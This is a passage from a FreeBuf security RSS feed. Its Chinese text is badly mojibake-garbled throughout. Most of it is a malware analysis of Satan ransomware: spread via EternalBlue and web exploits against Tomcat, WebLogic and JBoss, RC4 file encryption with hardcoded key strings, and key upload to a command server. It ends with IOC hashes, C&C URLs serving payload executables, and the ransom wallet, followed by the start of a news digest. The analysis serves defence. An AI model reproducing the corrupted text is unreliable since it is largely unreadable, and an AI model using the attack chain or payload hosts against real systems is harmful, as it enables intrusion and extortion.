663<p>和线程1相比,线程2å¢žåŠ äº†ä¸€ä¸ªåˆ¤æ–ï¼Œå¦‚æžœä¼ å…¥çš„ç«¯å£æ˜¯445,则执行永æ’ä¹‹è“æ¼æ´žæ”»å‡»ï¼Œå¦åˆ™æ‰§è¡Œwebæ¼æ´žæ”»å‡»ï¼Œä¸è¿‡é’ˆå¯¹445端å£çš„æ°¸æ’ä¹‹è“æ”»å‡»ä¸ä¼šç”Ÿæ•ˆï¼Œå› 为硬编ç çš„226个端å£ä¸ä¸åŒ…å«445端å£ï¼Œå³ä½¿åŒ…å«ï¼Œä¸Šå±‚函数也ä¸ä¼šä¼ 递445端å£ã€‚å› ä¸ºçº¿ç¨‹1å°±å¯ä»¥å®Œæˆå±€åŸŸç½‘çš„445ç«¯å£æ”»å‡»äº†ï¼Œæ¤å¤„å°±ä¸ç”¨å†æ”»å‡»äº†ã€‚æ¤ç—…毒旧版本的硬编ç 端å£åˆ—表ä¸åŒ…å«445端å£ã€‚新版本的端å£åˆ—è¡¨ä¿®æ”¹äº†ï¼Œä½†æ˜¯è¿™é‡Œçš„ä»£ç æ²¡æœ‰ä¿®æ”¹ï¼Œå› æ¤è¿™é‡Œçš„åˆ¤æ–æ˜¾å¾—有些多余。</p>
664<p><img alt="image081.png" src="http://image.3001.net/images/20180720/15320550545670.png!small" width="626" height="513"></p>
665<p style="text-align: center;">图:判æ–ç«¯å£æ‰§è¡Œæ”»å‡»</p>
666<p>æ¤å¤–在执行web攻击之å‰ä¼šè®¾ç½®ä¸€ä¸ªæ ‡å¿—ä½ï¼Œå¦‚æžœç«¯å£æ˜¯443或8443åˆ™å°†æ ‡å¿—ä½è®¾ç½®ä¸º1,目的是拼凑攻击报文时,区分http还是https。httpsæœåŠ¡é»˜è®¤443端å£ï¼Œtomcatçš„httpsæœåŠ¡éœ€è¦8443端å£ã€‚</p>
667<p><img alt="image083.png" src="http://image.3001.net/images/20180720/15320551596811.png!small" width="428" height="130"><img alt="image085.png" src="http://image.3001.net/images/20180720/1532055159960.png!small" width="423" height="87"></p>
668<p style="text-align: center;">图:拼凑攻击报文</p>
669<p>之所以没有固定端å£ï¼Œå¯¹åŒä¸€ä¸ªIP使用ä¸åŒçš„端å£å¾ªçŽ¯æ”»å‡»226æ¬¡ï¼Œæ˜¯å› ä¸ºç½‘ç»œä¸æœ‰äº›æœºå™¨æ²¡æœ‰æ‰“è¡¥ä¸ï¼Œä½†æ˜¯ä¼šå°†å„ç§webæœåŠ¡çš„é»˜è®¤ç«¯å£å·ä¿®æ”¹ä¸ºå…¶å®ƒç«¯å£å·ï¼Œä½œä¸ºæ¼æ´žç¼“è§£æŽªæ–½ã€‚æ”»å‡»è€…é€šè¿‡è¿™ç§æ–¹å¼ç»•过缓解措施。这也为我们æäº†ä¸ªé†’,缓解措施很有å¯èƒ½è¢«ç»•è¿‡ï¼ŒæŠŠæ¼æ´žå½»åº•ä¿®å¤æ‰èƒ½æ›´å¤§é™åº¦çš„é¿å…被攻击。</p>
670<p>硬编ç 的内置端å£åˆ—表:</p>
671<p><img alt="image087.png" src="http://image.3001.net/images/20180720/15320551947362.png!small" width="690" height="489"></p>
672<p style="text-align: center;">图:硬编ç 的攻击端å£åˆ—表</p>
673<p>线程3和线程2çš„åŒºåˆ«ä¸»è¦æ˜¯çº¿ç¨‹2攻击的是局域网IP,线程3攻击的是内置的互è”网IP,病毒内置了大é‡çš„IPæ®µï¼Œå¾ªçŽ¯éšæœºé€‰å–攻击。</p>
674<p><img alt="image089.png" src="http://image.3001.net/images/20180720/15320552221546.png!small" width="663" height="120"></p>
675<p style="text-align: center;">图:循环攻击内置的IP段</p>
676<p>从内置的硬编ç çš„IPä¸ï¼Œéšæœºé€‰å–å°†è¦æ”»å‡»çš„IPåœ°å€æ®µã€‚</p>
677<p><img alt="image091.png" src="http://image.3001.net/images/20180720/15320552423139.png!small" width="690" height="322"></p>
678<p style="text-align: center;">å›¾ï¼šéšæœºé€‰å–</p>
679<p>线程3的攻击函数和线程2相åŒï¼Œæ”»å‡»æ¯ä¸ªIP时,都会循环攻击硬编ç çš„226个端å£ï¼ŒåŒæ ·ç”±äºŽå†…置的编ç 表ä¸ä¸å«æœ‰445端å£ï¼Œæ”»å‡»äº’è”ç½‘çš„çº¿ç¨‹ä¹Ÿæ— æ³•å¯¹445端å£å‘èµ·æ°¸æ’ä¹‹è“æ”»å‡»ï¼Œåªä¼šå‘指定的IPå‘èµ·web攻击。</p>
680<p><img alt="image093.png" src="http://image.3001.net/images/20180720/15320552688029.png!small" width="618" height="287"></p>
681<p style="text-align: center;">图:循环攻击指定的IP端å£</p>
682<p><img alt="image095.png" src="http://image.3001.net/images/20180720/15320553229382.png!small" width="639" height="524"></p>
683<p style="text-align: center;">图:判æ–ç«¯å£æ‰§è¡Œæ”»å‡»</p>
684<p>æ°¸æ’ä¹‹è“æ”»å‡»ï¼Œæ¼æ´žè§¦å‘åŽä¼šå°†down64.dllæ¤å…¥åˆ°è¢«æ”»å‡»æœºå™¨ã€‚</p>
685<p><img alt="image097.png" src="http://image.3001.net/images/20180720/15320554041095.png!small" width="690" height="98"></p>
686<p style="text-align: center;">图:永æ’ä¹‹è“æ”»å‡»</p>
687<p> </p>
688<p>down64.dll的功能是è”网下载è¿è¡Œç—…毒æ¯ä½“ï¼Œè¢«æ”»å‡»æœºå™¨ä¸æ¯’åŽï¼Œåˆä¼šå¾ªçŽ¯åŒæ ·çš„æ“ä½œï¼ŒåŠ å¯†æœ¬æœºæ–‡ä»¶å‹’ç´¢ï¼Œæ”»å‡»å…¶å®ƒæœºå™¨ã€‚</p>
689<p>webæ”»å‡»åˆ©ç”¨äº†å¤šç§æ¼æ´žï¼Œæ–‡ä»¶ä¸Šä¼ æ¼æ´žã€‚</p>
690<p><img alt="image099.png" src="http://image.3001.net/images/20180720/15320554472429.png!small" width="690" height="168"></p>
691<p style="text-align: center;">å›¾ï¼šæ–‡ä»¶ä¸Šä¼ æ¼æ´ž</p>
692<p>tomcatå¼±å£ä»¤æ”»å‡»ã€‚</p>
693<p><img alt="image101.png" src="http://image.3001.net/images/20180720/15320554854498.png!small" width="690" height="437"></p>
694<p style="text-align: center;">图:tomcatå¼±å£ä»¤æ¼æ´ž</p>
695<p>CVE-2017-10271 WebLogic WLSç»„ä»¶æ¼æ´žã€‚</p>
696<p><img alt="image103.png" src="http://image.3001.net/images/20180720/15320555318754.png!small" width="667" height="135"><img alt="image105.png" src="http://image.3001.net/images/20180720/15320555313370.png!small" width="690" height="198"></p>
697<p style="text-align: center;">图:WebLogic WLSç»„ä»¶æ¼æ´ž</p>
698<p>CVE-2017-12149 JBOOS ååºåˆ—åŒ–æ¼æ´žã€‚</p>
699<p><img alt="image107.png" src="http://image.3001.net/images/20180720/15320555832265.png!small" width="690" height="322"></p>
700<p style="text-align: center;">图:JBOOS ååºåˆ—åŒ–æ¼æ´ž</p>
701<p>åŠ å¯†æ¨¡å—分æžï¼ŒSatan勒索病毒主è¦é’ˆå¯¹æ•°æ®æ–‡ä»¶è¿›è¡ŒåŠ å¯†ï¼ŒåŠ å¯†åŽè¿½åŠ æ–‡ä»¶åŽç¼€ä¸ºâ€œ.dbgerâ€ã€‚</p>
702<p><img alt="image109.png" src="http://image.3001.net/images/20180720/15320556198174.png!small" width="690" height="304"></p>
703<p style="text-align: center;">å›¾ï¼šè¢«åŠ å¯†æ–‡ä»¶çš„çŽ°è±¡</p>
704<p>勒索模å—è¿è¡ŒåŽï¼Œå°è¯•对所有驱动器é历文件,排除以下目录:</p>
705<p><img alt="b1.png" src="http://image.3001.net/images/20180723/15323113563981.png!small" width="632" height="133"></p>
706<p>表:病毒排除的目录</p>
707<p><img alt="image111.png" src="http://image.3001.net/images/20180720/15320556785623.png!small" width="533" height="523"></p>
708<p style="text-align: center;">图:病毒ä¸åŠ å¯†çš„ç›®å½•</p>
709<p>当为如下åŽç¼€æ—¶ï¼Œä¸ä¼šåŠ å¯†ï¼š</p>
710<p><img alt="b2.png" src="http://image.3001.net/images/20180723/15323114198083.png!small" width="635" height="71"></p>
711<p>è¡¨æ ¼ï¼šç—…æ¯’æŽ’é™¤çš„åŽç¼€</p>
712<p><img alt="image113.png" src="http://image.3001.net/images/20180720/15320557314342.png!small" width="254" height="449"></p>
713<p style="text-align: center;">图:病毒ä¸åŠ å¯†çš„æ–‡ä»¶ç±»åž‹</p>
714<p>ç„¶åŽåˆ›å»ºçº¿ç¨‹å¯¹éåŽ†åˆ°çš„æ–‡ä»¶è¿›è¡ŒåŠ å¯†ï¼Œç—…æ¯’è¿˜ä¼šå°è¯•å…³é—SQL相关æœåŠ¡é˜²æ¢æ–‡ä»¶è¢«å ç”¨æ— æ³•åŠ å¯†ã€‚</p>
715<p><img alt="image115.png" src="http://image.3001.net/images/20180720/15320557641028.png!small" width="453" height="480"></p>
716<p style="text-align: center;">图:关é—SQLæœåŠ¡</p>
717<p>åŠ å¯†åŽæ–‡ä»¶å:[dbger@protonmail.com]+原始文件å+.dbger。</p>
718<p><img alt="image117.png" src="http://image.3001.net/images/20180720/15320558129637.png!small" width="419" height="146"></p>
719<p style="text-align: center;">å›¾ï¼šè¢«åŠ å¯†çš„æ–‡ä»¶ 命å规则</p>
720<p>æŠŠåŠ å¯†å¯†é’¥ä¸Šä¼ åˆ°ç»™è¿œç¨‹æœåС噍101.99.84.136。</p>
721<p><img alt="image119.png" src="http://image.3001.net/images/20180720/1532055863232.png!small" width="690" height="196"></p>
722<p style="text-align: center;">图:访问控制æœåС噍</p>
723<p>ç—…æ¯’çš„åŠ å¯†ç®—æ³•ï¼ŒåŠ å¯†æ–¹å¼:使用CryptAPIè¿›è¡ŒåŠ å¯†ï¼Œç®—æ³•ä¸ºRC4,密钥结构:[HardWareID]+k_str1+k_str2+k_str3+[PUBLIC]。</p>
724<p>密钥示例如下:</p>
725<p><img alt="image121.png" src="http://image.3001.net/images/20180720/15320559073288.png!small" width="521" height="295"><img alt="image123.png" src="http://image.3001.net/images/20180720/15320559075300.png!small" width="173" height="131"></p>
726<p style="text-align: center;">图:密钥结构</p>
727<p>使用Windows自带的CryptAPIè¿›è¡ŒåŠ å¯†ï¼ŒMD5ç®—æ³•å“ˆå¸Œå¯†é’¥ï¼ŒåŠ å¯†ç®—æ³•ä¸ºRC4。</p>
728<p><img alt="image125.png" src="http://image.3001.net/images/20180720/15320559432699.png!small" width="649" height="404"></p>
729<p style="text-align: center;">å›¾ï¼šåŠ å¯†ç®—æ³•ä¸ºRC4</p>
730<p>硬编ç 了三个å—符串,</p>
731</p>
732<pre><code>k_str1:"dfsa#@FGDS!dsaKJiewiu*#&*))__=22121kD()@#(*#@#@!DSKL909*(!#!@AA"
733k_str2:"*@#AdJJMLDML#SXAIO98390d&th2nfd%%u2j312&&dsjdAa"
734k_str3:"@!FS#@DSKkop()(290#0^^^2920-((__!#*$gf4SAddAA"。</code></pre>
735<p><img alt="image127.png" src="http://image.3001.net/images/20180720/15320560017875.png!small" width="690" height="112"></p>
736<p style="text-align: center;">图:硬编ç çš„å—符串,作为密钥的一部分</p>
737<p>HardWareIDå’ŒPUBLICéƒ½æ˜¯æ˜¯éšæœºç”Ÿæˆçš„。首先,它会å°è¯•读å–ä¿å˜åœ¨C:\Windows\Temp\KSessionä¸çš„HardWareIDå€¼ï¼Œå¦‚æžœå¤±è´¥åˆ™éšæœºç”Ÿæˆ0×40大å°å—ç¬¦ä¸²ï¼ˆå›ºå®šçš„ï¼ŒåŠ å¯†è¿‡ç¨‹åªç”Ÿæˆä¸€æ¬¡ï¼‰ï¼Œç„¶åŽå†™å…¥äº†KSession文件ä¸ã€‚ </p>
738<p><img alt="image129.png" src="http://image.3001.net/images/20180720/15320560311524.png!small" width="505" height="287"></p>
739<p style="text-align: center;">图:生æˆHardWareID </p>
740<p><img alt="image131.png" src="http://image.3001.net/images/20180720/15320560703686.png!small" width="619" height="205"></p>
741<p style="text-align: center;">图:HardWareID会被ä¿å˜åœ¨KSessionæ–‡ä»¶ä¸ </p>
742<p>åŒæ ·çš„æ–¹å¼ç”Ÿæˆé•¿åº¦ä¸º0×20大å°çš„PUBLIC值(æ¯åŠ å¯†ä¸€ä¸ªæ–‡ä»¶ç”Ÿæˆä¸€æ¬¡ï¼‰ã€‚</p>
743<p><img alt="image133.png" src="http://image.3001.net/images/20180720/15320560702833.png!small" width="506" height="309"></p>
744<p style="text-align: center;">图:生æˆPUBLIC </p>
745<p>从图ä¸å¯ä»¥çœ‹åˆ°ï¼Œæ¯ä¸ªæ–‡ä»¶çš„PUBLIC是ä¸åŒçš„。</p>
746<p><img alt="image135.png" src="http://image.3001.net/images/20180720/1532056070123.png!small" width="601" height="419"></p>
747<p style="text-align: center;">图:æ¯ä¸ªæ–‡ä»¶çš„PUBLICä¸åŒ </p>
748<p>最终HardWareIDå’ŒPUBLICéƒ½ä¼šè¿½åŠ åˆ°ï¼Œè¢«åŠ å¯†æ–‡ä»¶çš„æœ«å°¾ã€‚</p>
749<p><img alt="image137.png" src="http://image.3001.net/images/20180720/1532056070220.png!small" width="535" height="166"></p>
750<p style="text-align: center;">图:å¯ä»¥åœ¨è¢«åŠ å¯†çš„æ–‡ä»¶æœ«å°¾çœ‹åˆ°HardWareID与PUBLIC的值</p>
751<p>ç—…æ¯’ä¸ºäº†åŠ å¿«åŠ å¯†é€Ÿåº¦ï¼Œå¯¹ä¸åŒå¤§å°ï¼Œä¸åŒç±»åž‹çš„æ–‡ä»¶é‡‡å–ä¸åŒçš„åŠ å¯†ç–略,é‡è¦çš„æ–‡æ¡£ä¾‹å¦‚ wordã€excelæ–‡æ¡£å…¨éƒ¨åŠ å¯†ã€‚å…¶å®ƒæ–‡æ¡£æ ¹æ®æ–‡ä»¶å¤§å°ï¼ŒåŠ å¯†æ–‡ä»¶çº¦å‰äºŒåˆ†ä¹‹ä¸€ã€å‰äº”分之一ä¸ç‰ã€‚</p>
752<p>特殊åŽç¼€å¦‚ä¸‹ï¼Œä¸»è¦æ˜¯æ¯”较é‡è¦çš„åŠžå…¬æ–‡æ¡£ã€æºä»£ç 文档的åŽç¼€å。</p>
753<p><img alt="b3.png" src="http://image.3001.net/images/20180723/15323114792458.png!small" width="636" height="95"></p>
754<div class="simditor-table">
755<div class="simditor-resize-handle"></div>
756</div>
757<p style="text-align: center;">è¡¨ï¼šå®Œå…¨åŠ å¯†çš„ç‰¹æ®ŠåŽç¼€</p>
758<p>åŠ å¯†æ–¹å¼ä¸ºå¦‚ä¸‹å‡ ç§ï¼š </p>
759<p>1ã€å°äºŽç‰äºŽ100000000å—节 </p>
760<p>(1)特殊åŽç¼€ï¼Œå®Œå…¨åŠ å¯†ã€‚</p>
761<p>(2)其它åŽç¼€ï¼Œéƒ¨åˆ†åŠ å¯†ï¼ŒåŠ å¯†å¤§å°çš„算法 CryptSize = (FileSize / 2000) *1000,约为文件的二分之一。</p>
762<p>举个例å,文件å°äºŽç‰äºŽ100000000å—节时,zipæ ¼å¼çš„åŽ‹ç¼©åŒ…å°±ä¼šè¢«å®Œå…¨åŠ å¯†ï¼Œè€ŒRARæ ¼å¼çš„åªä¼šè¢«åŠ å¯†å¤§çº¦äºŒåˆ†ä¹‹ä¸€ï¼Œå› ä¸ºzip是病毒指定的特殊åŽç¼€ï¼Œè€ŒRARä¸åœ¨åˆ—表ä¸ã€‚</p>
763<p>2ã€å¤§äºŽ100000000 å—节的文件 </p>
764<p>(1)特殊åŽç¼€ï¼Œå®Œå…¨åŠ å¯†ã€‚</p>
765<p>(2)其它åŽç¼€ï¼Œéƒ¨åˆ†åŠ å¯†ï¼ŒåŠ å¯†å¤§å°çš„算法 CryptSize = (FileSize / 5000) *1000,约为文件的五分之一。 </p>
766<p>举个例å,文件大于100000000å—节时,zipæ ¼å¼çš„åŽ‹ç¼©åŒ…å°±ä¼šè¢«å®Œå…¨åŠ å¯†ï¼Œè€ŒRARæ ¼å¼çš„ åªä¼šè¢«åŠ å¯†å¤§çº¦äº”åˆ†ä¹‹ä¸€ï¼Œå› ä¸ºzip是病毒指定的特殊åŽç¼€ï¼Œè€ŒRARä¸åœ¨åˆ—表ä¸ã€‚</p>
767<p>å½“åŠ å¯†å®ŒæˆåŽï¼Œç—…毒会打开勒索文本æç¤ºç”¨æˆ·æ”¯ä»˜èµŽé‡‘ã€‚å‹’ç´¢ä¿¡æ¯æä¾›ä¸‰ç§è¯è¨€è‹±æ–‡ã€ä¸æ–‡å’ŒéŸ©æ–‡ï¼Œå¨èƒå—害者在三天之内å‘作者支付1个比特å¸ï¼Œå¦åˆ™æ–‡ä»¶æ— 法解密,并且é‡è¦æ–‡ä»¶è¢«å…¬å¼€ã€‚然而事实上文件å¯ä»¥è§£å¯†ï¼Œå¹¶ä¸”病毒作者也没有获å–到å—害者的文件。</p>
768<p><b>比特å¸é’±åŒ…:3EbN7FP8f8x9FPQQoJKXvyoHJgSkKmAHPY</b></p>
769<p><b>邮箱:dbger@protonmail.com</b> </p>
770<p><img alt="image001.png" src="http://image.3001.net/images/20180720/15320564393372.png!small" width="682" height="512"></p>
771<p style="text-align: center;">图:弹出勒索信æ¯</p>
772<h2>IOC</h2>
773<p>MD5</p>
774<blockquote><p>ECF5CABC81047B46977A4DF9D8D68797 病毒æ¯ä½“</p>
775<p>C0150256A864E5C634380A53290C7649<span style="font-size: 16px;"> </span>åŠ å¯†æ¨¡å—</p>
776</blockquote>
777<p>C&C</p>
778<blockquote><p><a href="http://101.99.84.136" rel="nofollow">http://101.99.84.136</a></p>
779<p><a href="http://101.99.84.136/cab/sts.exe">http://101.99.84.136/cab/sts.exe</a></p>
780<p><a href="http://101.99.84.136/cab/st.exe">http://101.99.84.136/cab/st.exe</a></p>
781<p><a href="http://101.99.84.136/data/token.php?status=ST&code=">http://101.99.84.136/data/token.php?status=ST&code=</a></p>
782<p><a href="http://101.99.84.136/data/token.php?status=BK&code=">http://101.99.84.136/data/token.php?status=BK&code=</a></p>
783<p><a href="http://101.99.84.136/data/token.php?status=DB&code=">http://101.99.84.136/data/token.php?status=DB&code=</a></p>
784<p><a href="http://101.99.84.136/data/token.php?status=ALL&code=">http://101.99.84.136/data/token.php?status=ALL&code=</a></p>
785<p><a href="http://101.99.84.136/count.php?url=">http://101.99.84.136/count.php?url=</a></p>
786</blockquote>
787<p><span style="color: rgb(159, 163, 168);"><b>*本文作者:瑞星,转载请注明æ¥è‡ªFreeBuf.COM</b></span></p>
788]]></content:encoded>
789 <wfw:commentRss>http://www.freebuf.com/articles/system/178171.html/feed</wfw:commentRss>
790 <slash:comments>10</slash:comments>
791 </item>
792 <item>
793 <title>BUFæ—©é¤é“º | åŠ å¯†æ¼æ´žå½±å“大é‡è“牙设备;电å邮件攻击急剧上å‡ï¼Œé‚®ä»¶å®‰å…¨é£Žé™©å¢žå¤§ï¼›APP 注销难引官媒关注,人民日报点评称è¦ä¿éšœä¿¡æ¯å®‰å…¨</title>
794 <link>http://www.freebuf.com/news/178730.html</link>
795 <comments>http://www.freebuf.com/news/178730.html#comments</comments>
796 <pubDate>Wed, 25 Jul 2018 23:00:54 +0000</pubDate>
797 <dc:creator>AngelaY</dc:creator>
798 <category><![CDATA[资讯]]></category>
799 <category><![CDATA[APP注销]]></category>
800 <category><![CDATA[BUFæ—©é¤é“º]]></category>
801 <category><![CDATA[ä¿¡æ¯å®‰å…¨]]></category>
802 <category><![CDATA[åŠ å¯†æ¼æ´ž]]></category>
803 <category><![CDATA[物ç†å¯†é’¥]]></category>
804 <category><![CDATA[电å邮件攻击]]></category>
805 <category><![CDATA[é’“é±¼]]></category>
806
807 <guid isPermaLink="false">http://www.freebuf.com/?p=178730</guid>
808 <description><![CDATA[稻花香里说丰年,å¬å–蛙声一片。 å„ä½ Buffer 早上好,今天是 2018 å¹´ 7 月 26 æ—¥æ˜ŸæœŸå››ï¼Œå†œåŽ†å…æœˆå四。今天份的 BUFæ—©é¤å†…å®¹æœ‰ï¼šåŠ å¯†æ¼æ´žå½±å“大é‡è“牙实现,主æµåŽ‚å•†è®¾å¤‡éƒ½å—å½±å“;电å邮件网络攻击急剧上å‡ï¼Œé‚®ä»¶å®‰å…¨é£Žé™©å¢žå¤§ï¼› è°·æŒå¼•入物ç†å¯†é’¥åŽï¼Œ8.5 万雇员都没有å†è¢«æˆåŠŸé’“é±¼ï¼›é»‘å®¢åœ¨è™šå‡ HTTP 错误页é¢ä¸éšè—登陆页é¢ï¼ŒèŽ·å– webshell 用于攻击;APP  注销难引官媒关注,人民日报点评称è¦ä¿éšœä¿¡æ¯å®‰å…¨ã€‚ 安全资讯早知é“,两分钟å¬å®Œæœ€æ–°å®‰å…¨å¿«è®¯~ 以下请看详细内容: åŠ å¯†æ¼æ´žå½±å“大é‡è“牙实现,主æµåŽ‚å•†è®¾å¤‡éƒ½å—å½±å“ è¿‘æ—¥ï¼Œå¤§é‡è“牙设备和系统被æ›å˜åœ¨ä¸¥é‡åŠ å¯†æ¼æ´ž CVE-2018-5383ï¼Œæ¼æ´žä¸»è¦æ˜¯å› 为支æŒè“ç‰™çš„è®¾å¤‡æ— æ³•å……åˆ†éªŒè¯â€œå®‰å…¨â€è“ç‰™è¿žæŽ¥æœŸé—´ä½¿ç”¨çš„åŠ å¯†å‚æ•°ã€‚这会导致é…对å‡å¼±å¹¶å¯¼è‡´è¿œç¨‹æ”»å‡»è€…获å–è®¾å¤‡ä½¿ç”¨çš„åŠ å¯†å¯†é’¥ï¼Œå¹¶æ¢å¤â€œå®‰å…¨â€è“牙连接ä¸çš„两个设备之间å‘é€çš„æ•°æ®ã€‚ ç›®å‰ï¼Œè‹¹æžœã€åšé€šã€è‹±ç‰¹å°”ã€é«˜é€šç‰å¤šå®¶ç¡¬ä»¶åŽ‚å•†éƒ½ç¡®è®¤å…¶è“牙实现和æ“作系统驱动都å—到影å“,苹果ã€åšé€šå’Œè‹±ç‰¹å°”å·²ç»å‘布了修å¤è¡¥ä¸ã€‚[æ¥æºï¼šbleepingcomputer] 电å邮件网络攻击急剧上å‡ï¼Œé‚®ä»¶å®‰å…¨é£Žé™©å¢žå¤§ ç½‘ç»œå®‰å…¨å…¬å¸ Mimecast 近期å‘布了《2018 邮件安全现状》报告,报告显示,攻击者æŒç»é’ˆå¯¹ç»ˆç«¯ç”¨æˆ·å‘èµ·é‚®ä»¶æ”»å‡»ï¼Œé‚®ä»¶æ”»å‡»æ•°é‡æ€¥å‰§ä¸Šå‡ã€‚在报告的å—访者ä¸ï¼Œå°†è¿‘ 40% çš„ C 端用户都认为自己所在公å¸çš„ CEO 是公å¸å®‰å…¨çš„薄弱环节;31% çš„ C ç«¯ç”¨æˆ·éƒ½æ›¾é€šè¿‡é‚®ä»¶ä¸æ…Žå°†æ•感数æ®å‘é€ç»™æ— 关人员。 æ¤å¤–,2017 年有 92% 的勒索软件都是通过邮件分å‘ï¼Œé€ æˆäº†è¾ƒå¤§å±å®³ã€‚90% çš„ç»„ç»‡éƒ½è¡¨ç¤ºé‚®ä»¶é’“é±¼æ”»å‡»æ•°é‡æœ‰æ‰€å¢žé•¿ã€‚ä½†æ˜¯ï¼Œåªæœ‰ 11% çš„ä¼ä¸šä¸æ–培è®å‘˜å·¥è¯†åˆ«ç½‘络攻击,而52% çš„ä¼ä¸šæ¯å¹´åªç»„织一次培è®ã€‚Mimecast CEO 表示,电å邮件攻击æŒç»å¢žé•¿ï¼Œé™¤äº†å¸¸è§„的防御之外,ä¼ä¸šè¿˜éœ€è¦é‡‡å–其他应对措施æ¥ç¡®ä¿å®‰å…¨ã€‚[æ¥æºï¼šinfosecurity] è°·æŒå¼•入物ç†å¯†é’¥åŽï¼Œ8.5 万雇员都没有å†è¢«æˆåŠŸé’“é±¼ 安全åšå®¢ KrebsOnSecurity 报é“,Google 从 2017 å¹´åˆå¼€å§‹è¦æ±‚所有雇员使用物ç†å¯†é’¥æ›¿ä»£å¯†ç ,æ¤åŽè¯¥å…¬å¸ 8.5 万å雇员没有一ä½çš„å·¥ä½œç›¸å…³å¸æˆ·è¢«æˆåŠŸé’“é±¼ã€‚ç‰©ç†å®‰å…¨å¯†é’¥æ˜¯å»‰ä»·çš„ USB 设备,å¯ä½œä¸ºåŒé‡è®¤è¯ï¼ˆ2FAï¼‰çš„æ›¿ä»£ã€‚å½“ç”¨æˆ·ç™»å½•æ—¶ï¼Œæ—¢éœ€è¦æä¾›å¯†ç ï¼Œè¿˜éœ€è¦æä¾›ç§»åŠ¨è®¾å¤‡ç‰ç‰©ç†å®‰å…¨å¯†é’¥ã€‚ Google å‘言人称,物ç†å®‰å…¨å¯†é’¥æ˜¯è®¿é—® Google æ‰€æœ‰å¸æˆ·çš„基础,自推行物ç†å®‰å…¨å¯†é’¥ä»¥æ¥ï¼Œå…¬å¸å†…é›‡å‘˜æ²¡æœ‰å†æŠ¥å‘Šè¿‡è´¦å·è¢«æŽ¥ç®¡çš„问题。[æ¥æºï¼škrebsonsecurity】 é»‘å®¢åœ¨è™šå‡ HTTP 错误页é¢ä¸éšè—登陆页é¢ï¼ŒèŽ·å– webshell 用于攻击 å®‰å…¨ç ”ç©¶äººå‘˜å‘çŽ°ï¼Œé»‘å®¢åœ¨ä¼ªé€ çš„ HTTP 错误页é¢ä¸éšè—登录表å•ã€èŽ·å– webshell 访问æƒé™ç”¨äºŽæ”»å‡»çš„è¡Œä¸ºè¿‘æœŸæœ‰æ‰€å¢žåŠ ã€‚è¿™äº›é¡µé¢å‡è£…出现 HTTP 错误,例如 404 Not Found 或 Forbiddenï¼Œä½†å®žé™…ä¸Šå´æ˜¯ç™»å½•页é¢ï¼Œå…许攻击者访问 webshell 以在æœåŠ¡å™¨ä¸Šå‘出命令。 利用 webshell,黑客å¯ä»¥ä¸Šä¼ æ¶æ„软件ã€ç½‘ç»œé’“é±¼è„šæœ¬æˆ–å…¶ä»–è½¯ä»¶ã€‚å¦‚æžœä¸æ…Žç‚¹å‡»åˆ°é¡µé¢ï¼Œå°±å¯èƒ½ä¸æ‹›ã€‚è¿™å¹¶éžæ˜¯ä¸€ç§æ–°çš„æ”»å‡»æŠ€æœ¯ï¼Œä½†è¿‘æ¥è¶Šæ¥è¶Šé¢‘ç¹ï¼Œå®¹æ˜“让ä¸ç†Ÿæ‚‰çš„人上当。[æ¥æºï¼šbleepingcomputer] APP æ³¨é”€éš¾å¼•官媒关注,人民日报点评称è¦ä¿éšœä¿¡æ¯å®‰å…¨ 近日,ä¸å›½é’年报社社会调查ä¸å¿ƒè”åˆé—®å·ç½‘,对 2002 åå—访者进行的一项调查显示,75.9% çš„å—访者é‡åˆ°è¿‡ APP è´¦å·é𾿳¨é”€çš„æƒ…况,62.9% çš„å—访者担心 APP è´¦å·æ³¨é”€éš¾ä¼šå¯¼è‡´è´¦å·è¢«ç›—用。目å‰ï¼Œå¾ˆå¤šåº”用软件商通过 APP 注册的形å¼èŽ·å–用户数æ®ï¼Œç„¶åŽå°†æ•°æ®å–出æ¥èŽ·å–æ”¶ç›Šï¼Œç»™ç”¨æˆ·é€ æˆç§ç§å›°æ‰°ã€‚ 对于应用软件商而言,设置简å•的注销通é“在技术层é¢å¹¶ä¸éš¾ï¼Œä½†ä¸šå†…人士é€éœ²ï¼Œè¿™äº›è½¯ä»¶å•†å¹¶ä¸æ„¿æ„è®©ç”¨æˆ·æ³¨é”€ï¼Œè¿™æ ·ä»–ä»¬å°±èƒ½ä¿è¯è‡ªå·±æŽŒæ¡è¶Šæ¥è¶Šå¤šçš„用户数æ®ï¼Œç”¨äºŽå°†æ¥å˜çŽ°ã€‚äººæ°‘æ—¥æŠ¥æµ·å¤–ç‰ˆè®¤ä¸ºï¼ŒAPP è´¦å·æ³¨é”€éš¾çš„行为其实是对用户éšç§çš„ä¾µçŠ¯ã€‚å¯¹äºŽæ‹’ç»æ³¨é”€è´¦æˆ·çš„行为,《电信和互è”网用户个人信æ¯ä¿æŠ¤è§„定》和网络安全法都明确了惩戒举措,但从现状æ¥çœ‹ï¼Œæƒ©ç½šåŠ›åº¦æ˜Žæ˜¾ä¸å¤Ÿå¤§ã€‚未æ¥éœ€è¦æ›´ä¸¥åŽ‰çš„åº”å¯¹ä¸¾æŽªã€‚[æ¥æºï¼šäººæ°‘网] *AngelaY […]]]></description>
809 <content:encoded><![CDATA[<blockquote><p> 稻花香里说丰年,å¬å–蛙声一片。 </p>
810</blockquote>
811<p><span style="color: rgb(0, 176, 80);"><b>å„ä½ Buffer 早上好,今天是 2018 å¹´ 7 月 26 æ—¥æ˜ŸæœŸå››ï¼Œå†œåŽ†å…æœˆå四。今天份的 BUFæ—©é¤å†…容有:</b></span><span style="font-size: 16px;"><span style="color: rgb(0, 176, 80);"><b>åŠ å¯†æ¼æ´žå½±å“大é‡è“牙实现,主æµåŽ‚å•†è®¾å¤‡éƒ½å—å½±å“ï¼›</b></span><span style="font-size: 16px;"><span style="color: rgb(0, 176, 80);"><b>电å邮件网络攻击急剧上å‡ï¼Œé‚®ä»¶å®‰å…¨é£Žé™©å¢žå¤§ï¼›</b></span> <span style="font-size: 16px;"><span style="color: rgb(0, 176, 80);"><b>è°·æŒå¼•入物ç†å¯†é’¥åŽï¼Œ8.5 万雇员都没有å†è¢«æˆåŠŸé’“é±¼ï¼›</b></span><span style="font-size: 16px;"><span style="color: rgb(0, 176, 80);"><b>é»‘å®¢åœ¨è™šå‡ HTTP 错误页é¢ä¸éšè—登陆页é¢ï¼ŒèŽ·å– webshell 用于攻击;<span style="font-size: 16px;">APP </span> <span style="font-size: 16px;">注销难引官媒关注,人民日报点评称è¦ä¿éšœä¿¡æ¯å®‰å…¨ã€‚</span></b></span></span></span></span></span></p>
